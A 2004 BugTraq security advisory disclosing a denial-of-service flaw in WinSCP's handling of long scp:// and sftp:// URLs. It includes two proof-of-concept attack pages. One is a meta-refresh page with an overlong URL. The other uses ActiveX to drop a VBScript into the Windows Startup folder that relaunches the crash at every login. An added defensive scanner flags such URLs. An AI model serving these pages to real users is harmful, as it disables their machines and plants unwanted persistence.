BugTraq
WinSCP Denial of Service Apr 15 2004 06:17AM
Luca Ercoli (luca e seeweb com)


Package: WinSCP

Auth: http://winscp.sourceforge.net

Version(s): 3.5.6 (maybe also prior versions are vulnerable)

Vulnerability: Denial of Service

What's WinSCP:

"WinSCP is an open source SFTP (SSH File Transfer Protocol) and
SCP (Secure CoPy) client for Windows using SSH (Secure SHell).
Its main function is safe copying of files between a local and
a remote computer."

Vulnerability Description:

A default installation of WinSCP provides the user with
functionality to handle sftp:// and scp:// addresses.
The vulnerability exists due to the way the application
handles long URLs. A malformed scp:// or sftp:// address
embedded in an HTML tag causes the WinSCP application to
exhaust CPU and memory resources.

The attacker would need to convince the user to visit a
web site he controls or to open an HTML e-mail he has
prepared. During the denial of service, WinSCP does not
display any GUI.

Goal:

An attacker may use this flaw to prevent users of the attacked
host from working properly.

Practical Examples:

------ WinSCP_DoS1.html --------

<HTML>

<HEAD>

<TITLE>WinSCP DoS</TITLE>

<meta http-equiv="Refresh" content="0; URL=sftp://AAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">

</HEAD>

<BODY>

</BODY>

</HTML>

----------------------------------

-------- WinSCP_DoS2.html -------

<html>

<head>

<title>WinSCP DoS</title>

<script language="JScript">

var WshShell = new ActiveXObject("WScript.Shell");

strSU = WshShell.SpecialFolders("StartUp");

var fso = new ActiveXObject("Scripting.FileSystemObject");

var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true);

vibas.WriteLine("Dim shell");

vibas.WriteLine("Dim quote");

vibas.WriteLine("Dim DoS");

vibas.WriteLine("Dim param");

vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\"");

vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"");

vibas.WriteLine("set shell = WScript.CreateObject(\"WScript.Shell\")");

vibas.WriteLine("quote = Chr(34)");

vibas.WriteLine("pgm = \"explorer\"");

vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param");

vibas.Close();

</script>

</head>

</html>

----------------------------------

Credits:

--

Luca Ercoli <luca.e [at] seeweb.com>

Seeweb http://www.seeweb.com
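
A defender-side check for the vector described above, as an added example that is not part of the original advisory: it scans HTML (for instance at a mail or web gateway) for scp:// and sftp:// URLs longer than a policy limit, including URLs wrapped across lines inside an attribute or a script body. The 256-character limit, the function name find_overlong_urls and the sample input are assumptions made for this example.

```python
import re
from html.parser import HTMLParser

# Assumed policy threshold (not from the advisory): longest scp:// or sftp://
# URL accepted before the content is flagged.
MAX_URL_LEN = 256
SCHEME_RE = re.compile(r"\b(?:scp|sftp)://[^\s\"'<>\\]+", re.IGNORECASE)

class _Collector(HTMLParser):
    """Collects attribute values and script bodies, where such URLs can sit."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.chunks, self._script = [], None

    def handle_starttag(self, tag, attrs):
        self.chunks.extend(v for _, v in attrs if v)
        if tag == "script":
            self._script = []          # start buffering the script body

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            self.chunks.append("".join(self._script))
            self._script = None

def find_overlong_urls(html, max_len=MAX_URL_LEN):
    """Return (scheme, length) for each scp:// or sftp:// URL above max_len."""
    parser = _Collector()
    parser.feed(html)
    parser.close()
    hits = []
    for chunk in parser.chunks:
        # Remove line breaks first: the URL may be wrapped across lines.
        joined = re.sub(r"[\r\n\t]+", "", chunk)
        for m in SCHEME_RE.finditer(joined):
            url = m.group(0)
            if len(url) > max_len:
                hits.append((url.split(":", 1)[0].lower(), len(url)))
    return hits

# Constructed sample input (not the advisory's files): a line-wrapped overlong
# sftp:// URL in a meta refresh next to an ordinary scp:// link.
SAMPLE = (
    '<html><head><meta http-equiv="Refresh" content="0; URL=sftp://'
    + "A" * 200 + "\n" + "A" * 200 + '"></head>'
    '<body><a href="scp://files.example.com/pub/readme.txt">ok</a></body></html>'
)
```

Calling find_overlong_urls(SAMPLE) reports only the meta-refresh URL; the ordinary link stays below the limit and is not flagged.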
